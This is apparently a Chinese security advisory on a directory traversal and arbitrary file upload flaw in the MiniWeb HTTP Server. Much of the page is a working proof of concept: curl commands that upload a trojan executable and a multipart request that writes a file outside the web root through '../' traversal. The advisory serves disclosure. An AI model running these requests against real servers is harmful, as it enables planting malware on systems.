首页 -> 安全研究

安全研究

安全漏洞
MiniWeb HTTP Server目录穿越和任意文件上传漏洞

发布日期:2013-04-09
更新日期:2013-04-10

受影响系统:
sourceforge MiniWeb HTTP Server 0.x
描述:
BUGTRAQ  ID: 58946

MiniWeb是一个针对嵌入式应用而开发的微型Web Server,用C语言编写。

MiniWeb HTTP Server 20130309及其他版本存在安全漏洞,攻击者利用该漏洞可上传恶意文件到服务器任意位置。

<*来源:Akastep
  
  链接:http://secunia.com/advisories/52923/
        http://dl.packetstormsecurity.net/1304-exploits/miniweb-shelltraversal.txt
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Akastep ()提供了如下测试方法:

Arbitrary File Upload:

user@myhost /cygdrive/c/dir1/dir2
user@myhost /cygdrive/c/dir1/dir2
$ curl -I www.example.com
curl: (52) Empty reply from server

user@myhost /cygdrive/c/dir1/dir2
$ curl www.example.com
<html><head><title>/</title></head><body><table border=0 cellpadding=0
cellspacing=0 width=100%><h2>Directory of /</h2><hr><tr><td
width=35%><a href='../'>..</a></td><td width=15%>&lt;dir&gt;</td><td
width=15%></td><td>Sat, 06 Apr 2013 23:55:29 GMT</td></tr></
table><hr><i>Directory content generated by MiniWeb</i></body></html>
user@myhost /cygdrive/c/dir1/dir2

$ #Uploading remotely our troyan to remote system.

user@myhost /cygdrive/c/dir1/dir2
$ curl -i -F name=taskmgr.exe -F filedata=@taskmgr.exe
http://192.168.0.15:8000/epicfail/
HTTP/1.1 404 Not Found
Server: MiniWeb
Content-length: 125
Content-Type: text/html

<html><head><title>404 Not Found</title></head><body><h1>Not
Found</h1><p>The requested URL has no content.</p></body></html>
user@myhost /cygdrive/c/dir1/dir2
$ #Now fetching directory index from remote system.

user@myhost /cygdrive/c/dir1/dir2
$ curl www.example.com
<html><head><title>/</title></head><body><table border=0 cellpadding=0
cellspacing=0 width=100%><h2>Directory of /</h2><hr><tr><td
width=35%><a href='../'>..</a></td><td width=15%>&lt;dir&gt;</td><td
width=15%></td><td>Sat, 06 Apr 2013 23:55:29 GMT</td></tr><t
r><td width=35%><a href='taskmgr.exe'>taskmgr.exe</a></td><td
width=15%>329 KB</td><td width=15%>exe file</td><td>Sun, 07 Apr 2013
00:14:38 GMT</td></tr></table><hr><i>Directory content generated by
MiniWeb</i></body></html>
user@myhost /cygdrive/c/dir1/dir2
user@myhost /cygdrive/c/dir1/dir2

$ #Lol our troyan (taskmgr.exe) uploaded successfully) This is design
flaw.

user@myhost /cygdrive/c/dir1/dir2
$ curl www.example.com/taskmgr.exe>task2.exe


user@myhost /cygdrive/c/dir1/dir2
$ file task2.exe
task2.exe: PE32 executable (GUI) Intel 80386, for MS Windows, UPX
compressed

user@myhost /cygdrive/c/dir1/dir2
$ rm -rf task2.exe

METHOD: POST
URL: http://www.example.com/AAAAAAAAAAAAAAAAAAAAAAA

Directory Traversal:

Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101
Firefox/20.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: multipart/form-data;
boundary=---------------------------78522398122376
Content-Length: 84906


request body:

-----------------------------78522398122376
Content-Disposition: form-data; name="user"

-----------------------------78522398122376
Content-Disposition: form-data; name="pass"

-----------------------------78522398122376
Content-Disposition: form-data; name="file";
filename="../../../../../../../../../../../../../OWNED_BY_AKASTEP.txt"
Content-Type: image/png

Dude! Your machine OwnEd!

-----------------------------78522398122376
Content-Disposition: form-data; name="button"

Upload
-----------------------------78522398122376--

================================================================================

Few Printscreens:

1remotesystem.PNG

http://s019.radikal.ru/i612/1304/09/510e3b430b04.png

2attackersends.PNG

http://s017.radikal.ru/i406/1304/a1/494cef4de6f0.png
3remotesystempwned.PNG
http://s05.radikal.ru/i178/1304/f3/5fe4d9cb2111.png

建议:
厂商补丁:

sourceforge
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://miniweb.sourceforge.net/

浏览次数:3931
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障